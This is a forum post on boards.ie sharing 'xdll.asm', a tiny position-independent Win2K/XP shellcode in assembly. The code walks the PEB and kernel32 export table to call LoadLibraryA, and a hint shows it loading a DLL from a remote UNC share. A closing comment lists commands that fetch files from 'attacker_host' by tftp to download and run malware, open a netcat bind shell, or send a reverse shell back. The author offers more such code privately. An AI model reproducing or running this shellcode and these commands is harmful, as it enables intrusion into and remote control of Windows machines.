Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Tiny ShellCode for Win2K/XP

  • 30-04-2004 6:22pm
    #1
    Martyr
    Closed Accounts Posts: 1,567 ✭✭✭ 


    %title "xdll.asm"
comment £

	NOTE:This was.. intended for release in an e-zine next year.
	Its a little bit of work i done some months ago..I have alot
	more code similar, of course, but this was the smallest of the lot.
	You may find it interesting. :)
	If you want to see the other codes, send me a private message.
	And I'll get back to you asap.
	;===========================================================

	January 2004

	This is memory independent x86 assembly code for any Win2K/XP OS.
	It executes LoadLibraryA specifying user32 as arguement.
	However, this is just example of what is possible..
	The main thing to observe is the UNC hint.
	
	Elaborating a little..
	Entrypoint procedures of DLL files are executed when loaded into memory.
	So, DLL code need not be in assembly, ..NOT memory independent.
	You may use any HLL coded DLL, whether in C/C++/Java..etc
	
	Size of this code is currently 86 bytes.
	It doesn't do anything useful at the moment..but!
	One *could* have a stable reverse-shell, using loader under 100 bytes.
	
	tasm32 /ml /m9 xdll.asm
	tlink32 /Tpe /aa /x xdll.obj,,,import32.lib
£
.586
.model flat, stdcall
extrn	ExitProcess	:proc
.code
	ret
.data		; code is in data section, where everything writeable (tasm allows this)
main:
	mov	eax, exit_point-entry_point		; currently 86 bytes
entry_point:
	push	090c3565eh	; "pop esi/push esi/ret/nop" -> same as "call $+5" to get delta
	mov	eax, esp				; without null bytes
	call	eax
	lodsd						; skip 8 bytes of code
	lodsd
	push	esi						; LoadLibraryA arguement
	inc	byte ptr [esi + nUNCLen - 1]		; complete null terminated string
	jmp	$+nUNCLen+2
	;=====================
szUNC:
	;db	"\\HOST\SHARE\DLL",0ffh
	db	"user32",0ffh
nUNCLen	equ	$-szUNC
	;=====================
	push	30h
	pop	ecx
	mov	eax, fs:[ecx]			; Getting PEB Infos - Ratter/29A Issue 6
	mov	eax, [eax + 0ch]
	mov	esi, [eax + 1ch]
	lodsd
	mov	ebx, [eax + 08h]
	;=====================
	mov	cl, 03h
	mov	eax, [ebx + 3ch]			; size of optional PE header (word ;)
	mov	eax, [ebx + eax + 78h]		; export directory
	lea	esi, [ebx + eax + 1ch]		; offset API rva
load_rva:
	lodsd
	add	eax, ebx
	push	eax
	loop	load_rva
	pop	edx
	pop	esi
	mov	eax, 'daoL'				; 'Load' .. not reliable perhaps?
load_index:
	mov	edi, [esi + ecx * 4]
	add	edi, ebx
	inc	ecx
	scasd						; scan first 4 bytes of API string
	jne	load_index
	dec	ecx
	pop	esi
	movzx	eax, word ptr [edx + ecx * 2]		; get API ordinal
	add	ebx, [esi + eax * 4]			; add api address rva to base
	call	ebx						; call api
	;==================================
exit_point:
	push	eax
	call	ExitProcess		; only here for test & because win2k/xp crash with no imports

comment £

	Knowing that WinExec can be located in same procedure as LoadLibraryA.
	The following ways can be used to escalate privilege on system.

cmd /c tftp -i attacker_host GET malware.exe && malware.exe			; download & execute file
cmd /c tftp -i attacker_host GET nc.exe nc.exe && nc -Lp2004 -ecmd		; bind cmd to port 2004
cmd /c tftp -i attacker_host GET nc.exe nc.exe && nc attacker_host 2004 -ecmd	; reverse-callback cmd port 2004
	
	This all but eliminates the need for complex shell codes temporarily by simply executing commands.
£
end	main


Advertisement